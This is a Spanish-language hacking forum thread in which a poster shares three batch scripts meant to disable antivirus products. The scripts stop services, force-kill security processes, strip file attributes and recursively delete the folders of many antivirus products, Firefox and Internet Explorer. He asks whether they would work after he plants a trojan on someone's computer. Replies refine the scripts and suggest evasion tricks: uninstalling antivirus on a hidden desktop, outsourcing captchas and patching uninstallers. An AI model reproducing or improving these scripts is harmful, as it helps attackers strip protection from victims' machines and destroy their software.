Título: Atacar Antivirus en .bat
Publicado por: Xaerox en 14 Noviembre 2013, 05:16 am
Muchachos una pregunta, soy nuevo en esto del hacking, :( les quiero preguntar algo, ejecutando algunos de estos "virus" en .bat puedo destruir o inutilizar el antivirus de Kaspersky? >:D No conozco mucho sobre programación en batch por eso les pregunto, los codigos los encontre por alli en google. ;D El Primero: @echo off
net stop "Centro de Seguridad"
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM
NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
cd c:Archivos de programaArchiv os comunesSymante c Shared
attrib -H -S -R *.*
del /s /q *.*
rd c:Archivos de programaArchiv os comunesSymante c Shared
cd c:Archivos de programaArchiv os comunesSymante c SharedSPBBC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM symlcsvc.exe
cd C:Archivos de programaArchiv os comunesSymante c SharedCCPD-LC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SymWSC.exe /IM UsrPrmpt.exe
cd c:Archivos de programaArchiv os comunesSymante c SharedSecurity Center
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IM
cd c:Archivos de programaNorton Internet Security
attrib -H -S -R *.*
del /s /q *.*
cd c:Archivos de programaNorton Internet SecurityNorton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM zlcli6ent.exe /IM zo3nealarm.exe
cd C:Archivos de programa*one Labs*oneAlarm
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ewidoctrl.exe
cd C:Archivos de programaewido anti-malware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM vsmon.exe
C:WINDOWSsystem3 2*oneLabs
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
cd C:Archivos de programaNorton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaNorton AntiVirusIWP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM NPROTECT.EXE
cd C:Archivos de programaNorton Utilities
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd C:Archivos de programaWebroo tSpy Sweeper
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM
NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
rd C:Archivos de programaNorton SystemWorksNor ton AntiVirus
Taskkill /f /IM no-spy.exe
cd C:Archivos de programaSinEsp ias
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM spyaxe.exe /IM spyaxe.exe
cd C:Archivos de programaSpyAxe
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. exe
cd C:Archivos de programaSpywar eStrike
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM gcasDtServ.exe /IM gcasServ.exe
cd C:Archivos de programaMicros oft AntiSpyware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM kavsvc.exe /IM kav.exe
cd C:ARCHIVOS DE PROGRAMAKASPER SKY LABKASPERSKY ANTI-VIRUS PERSONAL
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe
cd c:archivos de programamcafee .comagent
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM VsStat.exe
cd C:Archivos de programaMcAfee McAfee VirusScan
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM firefox.exe
cd C:Archivos de programaMozill a Firefox
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium
attrib -H -S -R *.*
del /s /q *.*
rd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
cd C:Archivos de programaSynapt icsSynTP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM FrameworkServi ce.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXE
cd C:Archivos de programaNetwor k AssociatesViru sScan
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaNetwor k AssociatesComm on Framework
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe
cd C:Archivos de programaEset
attrib -H -S -R *.*
del /s /q *.*
rd C:Archivos de programaEset
Taskkill /f /IM AVGSERV9.EXE /IM AVGCC32.EXE
cd C:PROGRAM FILESGRISOFTAV G6
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:Archivos de programaAVPers onal
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.exe
cd C:ARCHIVOS DE PROGRAMAALWIL SOFTWAREAVAST4
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
cd "cd C:Archivos de programaGrisof t"
attrib -H -S -R *.*
del /s /q *.*
cd "AVGFRE*"
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM IEXPLORE.EXE
cd C:Archivos de programaIntern et Explorer
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
cd C:Archivos de programaPanda SoftwarePanda Administrator 3Pav_Agent
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaPanda SoftwarePanda Administrator 3Scheduler
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:Archivos de programaSoftwi nBitDefender9
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM xcommsvr.exe /IM livesrv.exe /IM bdss.exe
rd C:Archivos de programaArchiv os comunesSoftwin
Taskkill /f /IM DefWatch.exe /IM Rtvscan.exe
cd C:Archivos de programaSymant ec_Client_Secu ritySymantec AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgamsvr.exe /IM avgupsvc.exe
cd C:Archivos de programaAVG7
attrib -H -S -R *.*
del /s /q *.*
exit
el Segundo:
@echo off
c:
cd\
rd /q /s *norton*
rd /q /s *kav*
rd /q /s *kaspersky*
rd /q /s *panda*
rd /q /s *mcafee*
cd documents*
rd /q /s *norton*
rd /q /s *kav*
rd /q /s *kaspersky*
rd /q /s *panda*
rd /q /s *mcafee*
exit
y el ultimo:
@echo off
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:1
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:2
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:3
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:4
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
MANUAL DE PROGRAMACION EN BATCH http://209.85.229.132/search?q=cache:do6sau8zZCoJ:usuarios.multiman...
21 de 101 12/02/2010 9:44:5
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:6
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:7
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
:8
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:9
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:10
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:11
If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else
(goto 12)
:12
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:13
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:14
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto
15)
:15
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:16
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:17
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else
(gto 18)
:18
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:19
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:20
goto fin
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:kav
cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 15
:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
goto 14
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
attrib -H -S -R *.*
del /s /q *.*
goto 13
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM
PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
goto 12
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
goto 11
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM
symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
goto 10
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 9
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
goto 8
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
goto 7
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
goto 6
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM
mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
goto 5
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
goto 4
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
goto 3
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
goto 2
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
goto 1
:fin
exit De ante mano muchas gracias! Saludos.
Título: Re: Atacar Antivirus en .bat
Publicado por: Mad Antrax en 14 Noviembre 2013, 09:35 am
La idea es buena, pero yo cambiaría las rutas absolutas del BAT por variables del sistema, es decir:
%programfiles% en lugar de "C:\Archivos de Programa"
btw, buen trabajo :)
Título: Re: Atacar Antivirus en .bat
Publicado por: Xaerox en 14 Noviembre 2013, 13:11 pm
Listo Gracias....
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 14 Noviembre 2013, 17:27 pm
Ningún antivirus que se precie puede ser cerrado desde Batch y mucho menos sin privilegios de administrador.
Título: Re: Atacar Antivirus en .bat
Publicado por: Xaerox en 15 Noviembre 2013, 19:43 pm
Explicame algo karcrack, si yo introduzco un troyano en X ordenador, supongamos que esa cuenta tiene privilegios de Administrador, y yo subo le subo estos "virus" y los ejecuto remotamente. Lograria borrar y/o dañar los antivirus? Funcionarian?
Título: Re: Atacar Antivirus en .bat
Publicado por: burbu_1 en 16 Noviembre 2013, 10:18 am
la mayoría de antivirus tienen módulos de autoprotección cargados como drivers que no te dejan acceder a los procesos y archivos del antivirus.
Si tienes algún av instalado puedes comprobarlo intentando matar el proceso desde el taskmgr, o desde la consola con taskkill.
Saludos.
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 16 Noviembre 2013, 17:53 pm
En principio con privilegios de administrador podrías desinstalar cualquier antivirus, ya que si el desinstalador puede tú también. Lo más probable es que requieras de un reinicio para deshabilitarlo por completo.
Esto es sólo una idea ( :silbar:) pero siempre podrías con privilegios de administrador lanzar el desinstalador del propio antivirus y ahorrarte todo el esfuerzo :P Si quieres que no se vea nada de nada siempre puedes crear un escritorio (CreateDesktop(), etc...) e interactuar con la ventana de forma invisible.
Título: Re: Atacar Antivirus en .bat
Publicado por: Mad Antrax en 16 Noviembre 2013, 18:23 pm
En principio con privilegios de administrador podrías desinstalar cualquier antivirus, ya que si el desinstalador puede tú también. Lo más probable es que requieras de un reinicio para deshabilitarlo por completo.
Esto es sólo una idea ( :silbar:) pero siempre podrías con privilegios de administrador lanzar el desinstalador del propio antivirus y ahorrarte todo el esfuerzo :P Si quieres que no se vea nada de nada siempre puedes crear un escritorio (CreateDesktop(), etc...) e interactuar con la ventana de forma invisible.
No recuerdo el nombre, pero hay un antivirus que el propio desinstalador te enseña un captcha para evitar ese tipo de "trampas" xD
Título: Re: Atacar Antivirus en .bat
Publicado por: ny0s en 16 Noviembre 2013, 18:31 pm
este post se me hace muy parecido a otro post que lei en hackxcrack
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 16 Noviembre 2013, 18:44 pm
No recuerdo el nombre, pero hay un antivirus que el propio desinstalador te enseña un captcha para evitar ese tipo de "trampas" xD
Bastará con enviar el captcha a uno de esos servicios donde hay hindúes resolviéndolos por hora :laugh: O si te pones chulo siempre puedes parchear el desinstalador :rolleyes:
Título: Re: Atacar Antivirus en .bat
Publicado por: burbu_1 en 16 Noviembre 2013, 20:22 pm
hola Karcrack, siempre es un placer leerte,
de la misma manera que dices, en teoría, tambien se podrían conseguir privilegios de administrador, o saltarse la uac..... ya que si el usuario puede....
por ejemplo avast saca una ventana como la de la uac para desactivar sus escudos, en las ventanas de avira no funcionan las apis del mouse...... y me imagino que el resto tendrá defensas similares
Título: Re: Atacar Antivirus en .bat
Publicado por: Karcrack en 17 Noviembre 2013, 00:09 am
UAC sólo sale si no eres administrador... El mensaje de UAC se muestra en "Winlogon" (también lo usa para el screen de CTRL+ALT+SUPR) que es otro desktop creado por Windows para aislar los mensajes de otros desktops dado que no puedes enviar mensaje sin estar "dentro" del mismo y el acceso está restringido al grupo de Administradores sólo podrás eliminar UAC siendo Administrador.
Avast hace lo mismo que W$ pero con su propio desktop. Podrías enviar mensajes a ese ventana si vinculas tu thread al mismo desktop, por supuesto necesitarás ser administrador dado que al crear el desktop Avast introduce ese DACL.
Puedes leer más al respecto aquí:
http://msdn.microsoft.com/en-us/library/windows/desktop/ms682573(v=vs.85).aspx (http://msdn.microsoft.com/en-us/library/windows/desktop/ms682573(v=vs.85).aspx)
|